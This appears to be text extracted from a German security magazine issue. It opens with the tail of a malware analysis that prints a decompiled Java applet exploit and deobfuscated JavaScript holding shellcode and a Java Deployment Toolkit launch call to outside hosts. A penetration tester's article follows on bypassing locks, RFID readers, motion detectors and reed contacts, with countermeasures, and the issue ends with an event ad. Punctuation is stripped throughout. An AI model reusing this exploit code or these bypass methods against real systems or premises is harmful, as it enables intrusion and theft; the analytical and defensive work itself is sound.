localObject4 = (String)localObject4 + 26 0x26 =
amp
localObject4 = str2 + (String)localObject4
thismem = spray((String)localObject4 str10)
localObject5 = new URL((String)localObject1)
MidiSystemgetSequencer()
str21 =
MidiSystemgetSoundbank((URL)localObject5) lt-- put
in url here
str22 =
MidiSystemgetSequencer()
while (true)
Threadsleep(10L)
catch (Exception localException2)
Systemoutprintln(localException2)
Malware-Doppelschlag per JavaScript und JavaApplet
hakin9orgde 15
das Verbieten von JavaScript3 was moderne Ajax-basierte Internetseiten nahezu unbenutzbar macht haumltte auf das Laden des JavaApplets keine Auswir-kung
Wie kann man derartigen heterogenen Bedrohun-gen begegnen Das haumlufigste Einfallstor fuumlr Schad-software bleibt die E-Mail Also ist die Absicherung der E-Mail-Kommunikation der erste und wichtigs-te Schritt zur Sicherung des Systems Moderne An-ti-Spam und Anti-Virenprogramme sind in der Lage Massenmails mit gefaumlhrlichen Anhaumlngen zu erken-
nen bevor entsprechende Signaturen bereitstehen Weiterhin sollte der ausgehende E-Mail-Verkehr mit gleicher Sorgfalt auf Spam und Viren gepruumlft wer-den wie der eingehende Nur so kann man feststel-len ob man bereits ungewollt zum Spam- und Viren-versender geworden ist Am besten funktioniert dies mit einer ausgelagerten E-Mail-Sicherheitsloumlsung da der Anbieter meist von der Masse der empfangenen und analysierten E-Mails profitiert sprich Bedrohun-gen meist schneller erkennt als der einzeln agieren-de Mail-Server-Administrator Und letzen Endes gilt immer noch Oumlffnen Sie keine E-Mails oder Anhaumlnge von Unbekannten
httpde-wikipediaorgwikiJava_Virtual_Machine
fox
Listing 5 Codefragment des entschleierten JavaScript verdeutlicht das Potential
var fdata
var skd=u5350u5251u5756u9c55u00e8u0000u5d00
ued83 u6870u0070
var skd1=skd + u7468u7074 u0038u9000
var skd2=skd + u7468u7074 u0032u9000
function JAVASMB()
try
see httpwwwexploit-dbcomexploits12117 for
exploit description
var u = HTTP -J-jar -Jbittoramcomsmbold
avi httparestyutecom
sadhbdsa879321jbdaslphpi=2
none
if (windownavigatorappName == Microsoft Internet
Explorer)
try
var o = documentcreateElement(OBJECT)
oclassid = clsidCAFEEFAC-DEC7-0000-0000-
ABCDEFFEDCBA
olaunch(u)
catch (e)
var o2 = documentcreateElement(OBJECT)
o2classid = clsid8AD9C840-044E-11D1-B3E9-
00805F499D93
o2launch(u)
else
var o = documentcreateElement(OBJECT)
var n = documentcreateElement(OBJECT)
otype = applicationnpruntime-scriptable-
plugindeploymenttoolkit
ntype = applicationjava-deployment-toolkit
documentbodyappendChild(o)
documentbodyappendChild(n)
try
olaunch(u)
catch (e)
nlaunch(u)
catch (e)
IEPEERS()
IEPEERS()
JAVASMB()
MICHAEL PEICKEntwickler und Mitglied des eleven Research Teams
Penetration Testing im Jahre 2010
hakin9orgde 17
Im Jahr 2010 ist es kein Problem mehr ein Netzwerk vor Gefahren zu schuumltzen Firewall-Hardware gibt es mittlerweile zu erschwinglichen Preisen IT-System-
haumluser holen sich Sicherheitsexperten und richten mit deren Unterstuumltzung ein sicheres Netzwerk ein Mitar-beiter werden im Umgang mit der IT-Technik geschult sodass Phishing und Social Engineering Angriffe erfolg-los verlaufen IDS und IPS Systeme finden verdaumlchtige Aktivitaumlten im Netzwerk und zeigen diese dem Adminis-trator an Die IEEE 8021X Authentifizierung an Access Points und Netzwerkswitches verhindern den Zugang von unbekannten Computern zum Netzwerk Mit IEEE 8021Q (Virtual Local Area Network oder kurz VLAN) werden Netzwerke segmentiert obwohl alle Compu-ter hardwareseitig an einem Switch haumlngen Mit diesen Techniken ist man in der Lage ein Netzwerk sowohl vor Angriffen aus dem WAN als auch aus dem Inneren LAN zu schuumltzen ndash wuumlrde man meinen
Die RealitaumltIch wurde von einem mittelstaumlndischen Unternehmen engagiert einen Penetrationstest durchzufuumlhren Waumlh-rend der Footprinting-Phase habe ich sehr schnell er-kannt dass die IT-Sicherheit bei diesem Unternehmen ein sehr sensibles Thema ist Doch trotz fast paranoider Sicherheitsvorkehrungen ist es mir erfolgreich gelun-gen dem Unternehmen die Kundendaten zu entwen-den Zwar war IT-Technisch alles abgesichert der phy-sische Zugang zu den Daten war es allerdings nicht Die Eingangstuumlr des Unternehmens war wegen des
Kundenverkehrs nicht abgeschlossen Die Tuumlr zum Serverraum stand wohl wegen der Abwaumlrme sperran-gelweit offen im Schloss des Racks steckte der Schluumls-sel Es gab nichts und niemanden der mich davor ab-halten konnte aus jedem Server jeweils eine Festplatte einzustecken und blitzschnell das Gelaumlnde zu verlas-sen Weder der Geschaumlftsfuumlhrer noch die IT-Adminis-tration hat mit einem so dreisten und einfachen Angriff gerechnet
In dem folgenden Artikel werde ich die aktuelle Si-cherheitstechnik vorstellen und aufzeigen wie ein-fach diese Technik zerstoumlrungsfrei mit und fast spurlos uumlberlistet werden kann Dieser Artikel ist keine Anlei-tung wie man einbricht er soll lediglich die Schwach-stellen der heute massenhaft eingesetzten Systeme aufzeigen Aus diesem Grund habe ich mich bei den Beschreibungen kurz gefasst sowie einige Details weggelassen
Zugefallene TuumlrenWas ist eigentlich eine zugefallene Tuumlr Rund 95 al-ler Tuumlren haben heute ein Schloss mit einer Falle Wird die Tuumlr zugezogen faumlllt die Schlossfalle in die dafuumlr vorgesehene Oumlffnung des Schlieszligbleches in der Tuumlrz-arge Die Tuumlr laumlsst sich dann entweder mit dem Tuumlr-griff oder durch das drehen des Schlieszligzylinders wieder oumlffnen (wenn zB auf einer Seite ein Knauf statt eines Angriffes angebracht ist) Mit dem Schluumlssel reicht ei-ne halbe Umdrehung aus um die Tuumlr wieder zu oumlffnen Bei elektronischen Schlieszligsystemen erfolgt die Freiga-
Penetration Testing im Jahre 2010
Viele Administratoren uumlbersehen leider bei der Absicherung des Netzwerkes seine physikalische Sicherheit Die Bedrohung kommt nicht nur durch das Ethernet-Kabel
IN DIESEM ARTIKEL ERFAHREN SIE
werden koumlnnen
WAS SIE VORHER WISSENKOumlNNEN SOLLTEN
Dimitri Roschkowski
10201018
PRAXIS
Um so etwas zu verhindern bieten sich sogenannte Doppelfalztuumlren an (Abbildung 2) Diese Tuumlren haben einen zweiten Knick im Rahmen und Tuumlrblatt Eine an-gesetzte Oumlffnungsnadel kommt damit nicht mehr an die Schlieszligfalle ran und eine Oumlffnung wird damit verhindert Mit einer sogenannten bdquoMach Aufldquo Faltkarte laumlsst sich aber auch dieses Hindernis uumlberwinden
Damit eine Tuumlr mit diesen Techniken nicht geoumlffnet werden kann hilft es nur diese Tuumlr abzuschlieszligen Dabei wird mindestens ein Riegel in das Schlieszligblech geschoben der ohne Schluumlssel nicht mehr zuruumlckge-schoben werden kann Das Abschlieszligen einer Tuumlr mit Schluumlssel ist jedoch nicht komfortabel Diese Schwauml-che haben die Schlosshersteller erkannt und bie-ten selbstschlieszligende Schloumlsser an Diese Schloumls-ser schieben automatisch beim zufallen die Riegel in das Schlieszligblech Betaumltigt man die Tuumlrklinke wird gleichzeitig die Schlossfalle und die Riegel zuruumlckge-schoben die Tuumlr ist wieder offen Je nach Modell des Schlosses braucht man aber weiterhin eine bis zwei Umdrehungen mit dem Schluumlssel um diese Tuumlr zu oumlff-nen
Diese Schloumlsser sind allerdings nicht fuumlr Tuumlren ge-eignet die uumlber eine Elektronik geoumlffnet werden sol-len Hierfuumlr gibt es allerdings auch eine Loumlsung Es gibt Schloumlsser mit einer Elektronik und einem Elekt-romotor der dann bei einem entsprechenden Signal das Schloss aufschlieszligt und damit die Funktion eines Schluumlssels simuliert Allerdings sind solche Schloumlsser recht teuer
Lockpicking ndash Der Zylinder als AngriffszielEine weitere Schwachstelle einer Tuumlr ist der Zylinder Ein Laie kann nicht erkennen ob die Mechanik eines Zylinders sicher ist oder mit entsprechendem Werkzeug sekundenschnell uumlberlistet werden kann Fuumlr ihn zaumlhlt lediglich der Preis und die Logos auf der Verpackung um die Sicherheit beurteilen zu koumlnnen Hier gilt aller-dings ausnahmsweise der Grundsatz billig = schlechtteuer = gut wobei man dazu anmerken muss dass man die oberste Preiskategorie der Zylinder waumlhlen muss um tatsaumlchlich eine hohe Sicherheitsstufe her-stellen zu koumlnnen Dass man Zylinder oumlffnen kann liegt an der (Massen-)Herstellung dieser mechanischen Ge-raumlte Jedes Produkt weist gewisse Toleranzen auf je groumlszliger diese Toleranzen sind desto leichter laumlsst sich der Zylinder uumlberlisten
Wie Funktioniert ein SchlieszligzylinderEin Schlieszligzylinder besteht aus einem Gehaumluse (hell-grau) und einem Kern (dunkelgrau) Kernstifte (gelb) und Gehaumlusestifte (rot) verhindern dass der Kern ge-dreht werden kann Fuumlhrt man nun einen Schluumlssel in den Schlieszligkanal (weiszlig) ein druumlcken die Zaumlhne des Schluumlssels die Kernstifte herunter sodass der Uumlber-gang zwischen den Kernstiften und den Gehaumlusestif-
be dabei nicht an der Schlossfalle freigegeben sondern am Schlieszligblech
Wie laumlsst sich eine zugefallene Tuumlr oumlffnen Zugefallene Tuumlren lassen sich ganz einfach oumlffnen Schluumls-seldienste verwenden hierfuumlr Oumlffnungsnadeln (Abbildung 1) Diese Oumlffnungsnadeln werden in Houmlhe der Schlossfalle zwischen Tuumlrzarge und Tuumlrblatt angesetzt zieht man jetzt den hinteren Teil der Oumlffnungsnadel nach oben druumlckt der vordere Teil die Schlieszligfalle wieder ins Schloss zuruumlck ndash die Tuumlr ist damit offen Mit etwas Uumlbung dauert es nicht laumlnger als fuumlnf Sekunden um eine Tuumlr zu oumlffnen
Abbildung 2 Eine Oumlffnungsnadel an einer Doppelfalztuumlr
Abbildung 1 Zwei Saumltze Oumlffnungsnadeln
Penetration Testing im Jahre 2010
hakin9orgde 19
ten genau zwischen dem Kern und dem Gehaumluse ist In diesem Zustand laumlsst sich der Kern drehen und ein Schloss aufschlieszligen
Ich moumlchte hier drei Methoden vorstellen mit denen ein Schlieszligzylinder ohne Schluumlssel zerstoumlrungsfrei ge-oumlffnet werden kann Beim klassischen Handpicken geht es darum die Sperrstifte eines Schlosses so zu mani-pulieren dass diese den Kern freigeben Zunaumlchst wird ein Spanner in den Schlieszligkanal eingefuumlhrt und um ein paar Grad gedreht sodass ein minimaler Drehmoment auf die Sperrstifte wirkt Geht man jetzt mit einem Hand-pick die einzelnen Sperrstifte ab so laumlsst sich mit etwas Uumlbung erfuumlhlen welcher Stift gerade am meisten Wi-derstand bietet Druumlckt man diesen Stift mit dem Hand-pick herunter laumlsst sich der Kern ein kleines bisschen drehen sobald der der Gehaumlusestift den Kern verlas-sen hat Diesen Stift hat man jetzt gesetzt Nun sperrt ein anderer Sperrstift In einem normalen Schloss gibt es etwa fuumlnf solcher Stifte Hat man alle Stifte richtig gesetzt laumlsst sich der Kern drehen ist der Zylinder ist damit geoumlffnet
Eine weitere Methode um einen Schlieszligzylinder zu oumlffnen sind Schlagschluumlssel Ein Schlagschluumlssel ist ein spezieller aus Stahl gefertigter Schluumlssel der nur im Profil in einen Zylinder passt Die Zaumlhne des Schluumlssels wurden auf die tiefst moumlgliche Position gefraumlst auszliger-dem wurde der Anschlag des Schluumlssels um etwa ei-nen Millimeter verkuumlrzt sodass der Schluumlssel sich mit leichtem Druck etwas tiefer ins Schloss einfuumlhren laumlsst als vorgesehen Zum Oumlffnen des Zylinders fuumlhrt man den Schlagschluumlssel in den Zylinder ein und schlaumlgt an-schlieszligend mit einem flexiblen Hammer auf den Schluumls-sel Den Schlagimpuls uumlbertragen die Kernstifte auf die Gehaumlusestifte die dann nach unten gedraumlngt werden und damit den Kern freigeben Dreht man den Schlag-schluumlssel genau in diesem Moment (wenige Millisekun-den nach dem Schlag) laumlsst sich der Kern drehen und das Schloss oumlffnen
Die dritte Methode ist ein Elektro-Pick Ein Elek-tropick arbeitet nach dem gleichen Prinzip wie ein Schlagschluumlssel nur dass hier mehrere Schlaumlge pro Sekunde auf die Sperrstifte erfolgen Um einen Zylin-der mit dieser Methode zu oumlffnen fuumlhrt man die Na-del des Elektro-Picks sowie einen Spanner (entwe-der einen normalen oder einen Drehspanner) in den Schlieszligkanal ein und schaltet den Pick ein Anstatt den Pick durchgehend laufen zu lassen empfiehlt es sich ihn in kurzen Sequenzen ein- und auszuschalten Sind die Sperrstifte in passender Position laumlsst sich der Kern drehen
Bei allen drei vorgestellten Oumlffnungsmethoden hat man bei abgeschlossenen Schloumlssern immer ein Pro-blem Hat man einen Zylinder um 360deg gedreht druuml-cken die Federn die Gehaumlusestifte wieder in den Kern und man muumlsste den Zylinder erneut oumlffnen (picken) Um das zu verhindern ndash und damit stelle ich das letz-
te Werkzeug meiner Sammlung vor ndash benutzt man das bdquoFlip-Itldquo Werkzeug Dieses Werkzeug nutzt die physika-lische Traumlgheit aus indem der Zylinder so schnell dreht wird dass die Federn es nicht schaffen die Stifte in den Kern zu druumlcken Dazu spannt man den bdquoFlip-Itldquo erst einmal in der Richtung vor in der der Zylinder gedreht werden soll dann fuumlhrt man es in den Schlieszligkanal ein und druumlckt den Ausloumlser Der Zylinder wird dann uumlber die oberste Position gedreht und man kann das Schloss weiter oumlffnen
Man benoumltigt viel Uumlbung um einen Zylinder ohne Schluumlssel oumlffnen zu koumlnnen Denn macht man es mit Gewalt kann die Mechanik im inneren beschaumldigt wer-den Dann laumlsst sich das Schloss nicht einmal mit dem richtigen Schluumlssel oumlffnen
Sichere SchlieszligzylinderSichere Schlieszligzylinder gibt es in meinen Augen nicht Je nachdem welchen Aufwand und Kosten man auf sich nimmt wird man in der Lage sein alle Zylinder zu um-gehen Einen aus meiner Sicht relativ sicheren Zylin-der bietet die Firma EVVA mit dem MCS (Magnet Code System) an Statt normaler Stifte arbeitet dieser Zylin-der mit insgesamt acht Magnetrotoren Wird ein Schluumls-
Abbildung 4 Werkzeugsatz zur zerstoumlrungsfreien Oumlffnung von Schloumlssern
Abbildung 3 Ein Schlieszligzylinder im Querschnitt Links ist der Zylinder abgeschlossen rechts offen (Bildquelle Wikipediade)
10201020
PRAXIS
sel mit richtiger Magnet-Codierung eingefuumlhrt werden die Rotoren in die Schlieszligposition gebracht und der Zylinder laumlsst sich drehen Zusaumltzlich kann ein solcher Zylinder mit einer Elektronik auf RFID Basis ausgestat-tet werden Zusaumltzlich zum Magnetcode wird noch ei-ne elektronische Authentifizierung durchgefuumlhrt bevor dieser Zylinder trotz des richtigen Schluumlssels gedreht werden kann So koumlnnen zB verlorene Schluumlssel ge-sperrt werden oder um Mitarbeitern den Zutritt nur zu bestimmten Zeiten zu gestatten
CodeschloumlsserCodeschloumlsser sind in der Regel zugefallene Tuumlren und lassen sich am einfachsten mit den bereits oben vor-gestellten Methoden oumlffnen In diesem Artikel moumlchte ich aber auf eine weitere Schwachstelle hinweisen Die Abbildung 5 zeigt ein typisches Codeschloss anhand des Zylinders auf der rechten Seite kann jeder darauf schlieszligen wie groszlig die Code-Tasten dieses Schlosses in der Realitaumlt sind Wuumlrde man eine Codeeingabe fil-men koumlnnte man anhand der langen Handbewegun-gen auf den Code schlieszligen koumlnnen
Diese Schwachstelle laumlsst sich aber ganz einfach schlieszligen indem man den Eingabetasten die Ziffern fuumlr jede Codeeingabe per Zufallsgenerator zuweist Das bedeutet dass die obere linke Taste nicht permanent die Ziffer 1 eingibt sondern bei jeder Codeeingabe ei-ne andere Durch diese zufaumlllige Anordnung der Zif-fern auf den Tasten laumlsst sich nicht mehr anhand der Handbewegung feststellen welche Ziffer eingegeben wurde Umsaumltzen laumlsst sich eine solche Eingabetech-nik mit Siebensegmentanzeigen oder mini-OLED-Bild-schirmen unter durchsichtigen Tasten bzw mit einem Touchscreen
In Indoor-Bereich trifft man vor einigen Raumlumen auf eine einfachere Version von Codeschloumlssern Bei die-sen Schloumlssern liegt das Eingabeterminal direkt am Schloss an die Energieversorgung erfolgt uumlber Bat-terien Im geschlossenen Zustand laumlsst sich die Tuumlr-klinke ohne Funktion herunterdruumlcken Gibt man den richtigen Code ein wird ein Elektromagnet mit Strom versorgt und Zieht einen Stift an der die Tuumlrklinke mit dem Schloss verbunden Betaumltigt man jetzt die Tuumlrklin-ke so laumlsst sich die Tuumlr oumlffnen Da die Batterien in ei-nem solchen Schloss moumlglichst lange halten sollen arbeiten die Schloumlsser mit einem recht geringen Ma-gnetfeld Dieses Magnetfeld kann man jedoch mit ei-nem von auszligen angebrachten starken Magneten (sie-he auch Abschnitt uumlber Reed-Relais) simulieren und so das Schloss oumlffnen Im Uumlbrigen lassen sich mit einem starken Magneten auch einige aumlltere elektronische Zy-linder oumlffnen
Schlieszligsysteme mit RFID-TagsRFID steht fuumlr radio frequency identification also fuumlr die Identifikation uumlber Funkwellen Diese Technik
Abbildung 6 Ein Elektronisches Codeschloss an einer Gegensprechanlage
Abbildung 5 Ein EVVA-MCS Schluumlssel
Penetration Testing im Jahre 2010
hakin9orgde 21
ist heute sowohl bei Unternehmen als auch in Pri-vathaumlusern (Autoschluumlssel Funk-Garagentoroumlffner) sehr verbreitet und wegen des Komforts beliebt Im Wesentlichen besteht das System aus zwei Kompo-nenten einem RFID Lesegeraumlt und den sogenannten Tags Mit den Tags koumlnnen sich die Zugangsberech-tigten Personen am Lesegeraumlt identifizieren Unab-haumlngig davon ob das Tag aktiv (mit einer eigenen Energieversorgung) oder passiv (die notwendige Energie liefert das Lesegeraumlt) ist wird der Identifi-kationsvorgang vom Tag eingeleitet In den einfach-sten Faumlllen sendet das Tag unverschluumlsselt die eige-ne Seriennummer oder einen vorher eingespeicher-ten Code das Lesegeraumlt empfaumlngt den Code und uumlberpruumlft ob die Seriennummer oder der Code zu-gangsberechtigt ist In den wenigsten Faumlllen erfolgt eine zusaumltzliche Kryptographische Authentifizierung des Tags die aber wegen der geringen Rechenka-pazitaumlt und Energieversorgung sehr einfach ausfaumlllt
Wie kann man solche Systeme uumlberlisten Das Zauberwort dazu lautet bdquoSoftware Defined Ra-dioldquo (SDR) Mit einem SDR Tranceiver ist man in der Lage die Kommunikation zwischen dem Tag und dem Lesegeraumlt aufzuzeichnen und auf einem Rech-ner zu analysieren Anschlieszligend sendet man die aufgezeichneten und eventuell bearbeiteten Daten an das Lesegeraumlt
Wie laumluft ein solcher Angriff ab Zunaumlchst einmal muss man herausfinden auf wel-cher Frequenz die Kommunikation zwischen dem Le-segeraumlt und den Tags erfolgt Dazu kann man uumlber den Herstellernamen des Lesegeraumltes und seinem Produkt-Portfolio gehen oder einfach verschiedene Tags ausprobieren Wenn ein Tag mit dem einge-setzten Lesegeraumlt nicht kompatibel ist erfolgt keine Reaktion Wird dem Tag der Zugang verweigert so zeigt das Lesegeraumlt dies in der Regel an Dann wird ein SRD Tranceiver benoumltigt der auf der benoumltigten Frequenz arbeitet Dazu verwende ich den USRPUSRP2 Tranceiver mit einem passenden Daughter-board und einer Richtantenne (700$1400$ + 275$ + 100$) Der Vorteil dieses Universalsystems liegt daran dass man mit verschiedenen Daughterboard unterschiedliche Frequenzen abdecken kann Die Richtantenne richtet man dann etwas seitlich auf das Lesegeraumlt aus und faumlngt mit der Aufzeichnung der Daten in dem Frequenzbereich an Bei Long Range Tags (das Tag kann mehrere Meter vom Lesegeraumlt entfernt sein) reicht bei Unverschluumlsselten Systemen - wegen der houmlheren Sendestaumlrke - die Aufzeichnung einer Kommunikation aus Passive Tags wie RFID Karten senden ein viel schwaumlcheres Signal deshalb sind die Aufzeichnungen oft gestoumlrt In der Regel be-noumltigt man fuumlnf bis zehn Aufzeichnungen um ein Mus-
Abbildung 8 Eine Uumlberwachungskamera hat eine Veraumlnderung im Bild detektiert Der veraumlnderte Bildausschnitt wird in einem Rahmen angezeigt
Abbildung 7 Das Lesegeraumlt reagiert auf eine Mifare-Classic Karte und lehnt den Zugang ab
10201022
PRAXIS
ter zu finden Der Anfang der Uumlbertragung ist immer gleich in der Mitte gibt es einen variablen Bereich und das Ende ist bei allen Aufzeichnungen ebenfalls gleich Damit ein Lesegeraumlt nun dem virtuellen Tag den Zugang gewaumlhrt saumlubert man zunaumlchst einmal die Aufzeichnungen mit einigen Filtern GNU-Radio bietet hierfuumlr zahlreiche Moumlglichkeiten Dann stellt man sich aus mehreren Aufzeichnungen ca drei moumlglichst ideale (hier braucht man etwas Erfahrung ein gutes Auge und etwas Fingerspitzengefuumlhl) Kom-munikationen zusammen und sendet diese an das Lesegeraumlt Mindestens eine dieser Aufzeichnungen wird dann das Lesegeraumlt akzeptieren und dem An-greifer den Zugang gewaumlhren
Aus der Praxis kann ich sagen dass etwa 90 al-ler RFID-Karten-Systeme sich nur mit der Serien-nummer des Tags zufrieden geben Aumlltere Garagen-toroumlffner arbeiten mit einem statischen Code Neuere Garagentoroumlffner und einige Autohersteller nutzen ei-nen Rolling Code um den Nutzer zu identifizieren Im Maumlrz 2008 wurde auch dieses System von Forschern der Ruhr-Universitaumlt Bochum geknackt Zwei aufge-zeichnete Kommunikationen genuumlgen bereits fuumlr ei-ne Seitenkanalattacke Ebenfalls wurde im Jahr 2008 die Verschluumlsselung des Mifare-Systems per Rever-se Engineering geknackt Solche Verschluumlsslungen verlangsamen nur den Angriff und machen ihn teurer
Gibt es auch sichere RFID-Systeme Die gibt es durchaus Hier verwendet man eine asymmetrische Verschluumlsselung Fuumlr jedes zugangs-
berechtigte Tag wird ein privater und ein oumlffentlicher Schluumlssel erzeugt Der private Schluumlssel wird in einer Datenbank gespeichert auf die das Lesegeraumlt zu-greifen kann Der oumlffentliche Schluumlssel wird auf dem Tag gespeichert Die Identifizierung erfolgt dann in mehreren Schritten Wie oben bereits beschrieben faumlngt das Tag mit der Identifikation an indem es dem Lesegeraumlt seine Seriennummer mitteilt Das Lesege-raumlt generiert daraufhin eine Zufallszahl und sendet diese mit der Seriennummer des Tags wieder zuruumlck (Da die Kommunikation uumlber Funk erfolgt kann es sein dass zur gleichen Zeit mehrere RFID Tags aktiv sind Deshalb muss man waumlhrend der Kommunikati-on stets angeben fuumlr welchen Empfaumlnger eine Nach-richt bestimmt ist) Das Tag empfaumlngt die Nachricht verschluumlsselt diese mit dem oumlffentlichen Schluumlssel und sendet sie an das Lesegeraumlt zuruumlck Kann das Lesegeraumlt die empfangene Nachricht mit dem priva-ten Schluumlssel des Tags entschluumlsseln und stimmt die Nachricht mit der Zufallszahl uumlberein wird der Zu-gang gewaumlhrt
BewegungsmelderBewegungsmelder verwenden fuumlr die Bewegungsde-tektion Passiv Infrarot Sensoren (PIR) Jedes Objekt emittiert eine Waumlrmestrahlung ein PIR Sensor kann diese Strahlung messen Um Bewegungen detektieren zu koumlnnen wird der Sensor mit Buumlndellinsen in Be-reiche aufgeteilt Aumlndert sich die einfallende Strahlung in einem Bereich um einen bestimmten Schwellwert wird dies als Bewegung interpretiert Der Schwellwert sorgt auszligerdem dafuumlr dass statische Temperaturver-aumlnderungen der Umgebung nicht als Bewegung ge-deutet werden Diese Funktionsweise ist leider Fehler-anfaumlllig so kann zB ein kalter Luftstrom bereits einen Bewegungsmelder ausloumlsen Hierfuumlr setzen bessere Bewegungsmelder (Dualmelder) zusaumltzlich noch ei-nen Ultraschall-Sensor ein Nur wenn beide Sensoren ausloumlsen wird eine Bewegung gemeldet Damit sol-len Fehlalarme verhindert werden VdS-Anerkannte Bewegungsmelder die in Alarmanlagen verwendet werden loumlsen zusaumltzlich Alarm aus wenn diese ab-gedeckt werden
Wie kann man Bewegungsmelder uumlberlisten Je groumlszliger die Entfernung zu dem PIR Sensor ist des-to weniger nimmt eine Veraumlnderung Einfluss auf die einfallende Infrarotstrahlung in einem Bereich Auch haben Gegenstaumlnde mit gleicher Waumlrmestrahlung kei-nen Einfluss auf die Sensoren Einen Bewegungsmel-der (auch einen Dualmelder) kann man deshalb mit ei-nem Tuch uumlberlisten Zunaumlchst laumlsst man das Tuch im uumlberwachten Raum einige Minuten liegen damit es die Temperatur der Umgebung annimmt Wenn man sich jetzt in dieses Tuch einhuumlllt und seitwaumlrts mit dem Ruuml-cken zum Bewegungsmelder langsam an diesem vor-
Abbildung 9 Eine Buumlroklammer ist an einer Schnurr befestigt Selbst bei einem Abstand von 35cm ist das Magnetfeld noch so stark dass die Buumlroklammer in der Luft haumlngt
Magnete sind kein Spielzeug
Penetration Testing im Jahre 2010
hakin9orgde 23
beigeht wird keine Bewegung angezeigt Zwar merkt bei einem Dualmelder der Ultraschall-Sensor die Be-wegung da jedoch der Infrarot Sensor keine Bewe-gung meldet findet keine Alarmierung statt Wuumlrde man dieses Tuch etwa 30cm vor dem Bewegungsmel-der aufspannen wuumlrde man den Bewegungsmelder auszliger Funktion setzen Auch eine Abdeckerkennung wuumlrde hier nicht ausloumlsen da diese in der Regel bis 20cm funktioniert
Gibt es AlternativenSicherlich gibt es sie Zunaumlchst einmal gibt es Bewe-gungsmelder die auf Basis von Radarstrahlung funk-tionieren Diese aktiven Bewegungsmelder koumlnnen verdeckt zB unter einer Tapete oder Abdeckplatte in-stalliert werden Dadurch ist ein solcher Bewegungs-meder sowohl optisch nicht wahrnehmbar als auch vor Sabotage und Vandalismus geschuumltzt Ein solcher Bewegungsmelder arbeitet nach dem Dopplerprinzip und strahlt im 9GHz oder 24GHz-Mikrowellenbereich Zwar halten sich die Hersteller solcher Geraumlte an die gesetzlichen Bestimmungen ich wuumlrde allerdings im-mer auf eine zusaumltzliche Strahlenquelle verzichten wo es geht
Eine weitere Alternative zu Bewegungsmeldern sind Kameras Zwar halte ich persoumlnlich nichts von Uumlber-wachung und staumlndiger Videoaufzeichnung doch Kameras sind sehr gute Bewegungsmelder Im Ge-gensatz zu den klassischen PIR Ultraschall oder Ra-darbewegungsmeldern gibt es bei Kameras zahlrei-che Bildpunkte die ausgewertet werden koumlnnen Mit entsprechender Software kann man detektierte Bewe-gungen analysieren und zB mit einer Objekterken-nung interpretieren Verdaumlchtige Bilder lassen sich an ein Sicherheitsunternehmen in Echtzeit uumlbertragen wo ein Mensch beurteilt ob ein Alarm ausgeloumlst wer-den muss oder nicht
Reed-RelaisReed-Relais werden heute verwendet um zB Tuumlr- oder Fensteroumlffnungen zu detektieren Ein Reed-Re-lais besteht einem Reed-Kontakt und einem Magne-ten Der Reed-Kontakt wird am Rahmen befestigt und ist an die Einbruchmeldezentrale angeschlossen Der
Magnet wird auf dem beweglichen Element in Houmlhe des Kontaktes befestigt Wirkt ein Magnetfeld auf den Reed-Kontakt ziehen sich die Schaltkontakte gegen-seitig an und ein Stromkreis wird geschlossen Laumlsst das Magnetfeld nach wenn zB eine Tuumlr geoumlffnet wird und sich der Magnet dem Reed-Kontakt entfernt wird der Stromkreis geoumlffnet In diesem Fall wird dann der Alarm ausgeloumlst
Wie lassen sich Reed-Relais uumlberlisten Das ist vergleichbar einfach Die Antwort auf diese Fra-ge lautet natuumlrlich mit einem Magnetfeld Hierfuumlr eig-nen sich sogenannte bdquoTodesmagnetenldquo (Abbildung 9) Diese Permanentmagneten haben ein extrem starkes Magnetfeld Unter Laborbedingungen hat ein Reed-Kontant bereits bei einer Entfernung von 40cm zum Magneten seine Schaltkontakte geschlossen Holz- Plastik- oder sogar Metall-Tuumlren (sogar 2mm Stahl) bieten keine ausreichende Daumlmpfung fuumlr das Magnet-feld
Eine bessere Alternative zu Reed-Relais sind Licht- oder Laserschranken Diese Schranken bringt man so an dass die Tuumlr den Strahl beim oumlffnen unterbrechen muss
Ziele eines solchen AngriffesEs sind viele Angriffsziele denkbar Es kommt immer auf das Unternehmen an dass angegriffen wird Vor einigen Monaten berichtete die Presse uumlber einen sol-chen Angriff auf einen Baumarkt Kriminelle Einbre-cher haben hier statt waren zu stehlen die Elektronik der Karten-Terminals an den Kassen sabotiert sodass diese die eingelesenen Daten von EC- und Kreditkar-ten samt der vom Kunden eingegebenen PIN per Funk uumlbermittelt wurden Auf dem Parkplatz des Baumark-tes stand dann der Angreifer und hat die Daten emp-fangen
Ein anderes Angriffsziel koumlnnte der Anschluss eines Mini-Computers am Netzwerk sein der ein Loch durch die Firewall bohrt und dem Angreifer einen permanen-ten Zugriff auf das Netzwerk uumlber das Internet gestat-tet Auch ist die Installation eines Hardware-Keylogers denkbar um die Zugangsdaten eines Mitarbeiters aus-zuspionieren
DIMITRI ROSCHKOWSKIDer Autor arbeitet bereits seit vielen Jahren als selbststaumlndi-ger IT-Sicherheitsexperte und Consultant Er fuumlhrt auszligerdem bei Unternehmen Penetration Tests durchKontakt mit dem Autor dimitriroschkowskibiz
Im InternethttpdewikipediaorgwikiLockpicking ndash Wikipedia Ein-trag zum Thema LockpickinghttpwwwevvadezylindernhttpdewikipediaorgwikiReed-Relais ndash Wikipedia Ein-trag zum Reed-Relaishttpwwwelvde ndash Artikel-Nr 68-835-10 ndash Radar Bewe-gungsmelderhttpwwwettuscom
Die IT-Security Community Xchange ist DIE Weiterbildungsnacht fuumlr SystemadministratorInnen Lehrbeauftragte StudentInnen Schuumller-Innen ExpertInnen und Geeks
Themen BiometriePenetration TestingHackz und Crackz Privacy Forensische Analyse Intrusion Prevention Malwarededection Rootkits und deren Erkennung
Freitag 12 November 2010 17 ndash 24 UhrFachhochschule St PoumlltenMatthias Corvinus-Straszlige 15 3100 St PoumlltenT +432742313 228 E officefhstpacatI wwwfhstpacat
Jetzt noch schnell
anmelden unter
httpitsecxfhstpacat
Die Teilnahme ist kostenlos
12-11-2010
OCTAVE
hakin9orgde 25
Um dies zielorientiert und auf die vorhandenen Business Needs maszligzuschneidern sind Risiko-erkennung (Risikoanalyse) und deren anschlie-
szligende Bewertung (Business Impact Analyse) die ersten Schritte die gemacht werden muumlssen
Eine effektive Informations-Sicherheitsbewertung be-trachtet nicht nur den technologischen sondern auch den dahinter liegenden organisatorischen Aspekt Bei-spielsweise die Handhabung der IT-Infrastruktur durch die MitarbeiterInnen bei ihrer taumlglichen Arbeit Durch ei-
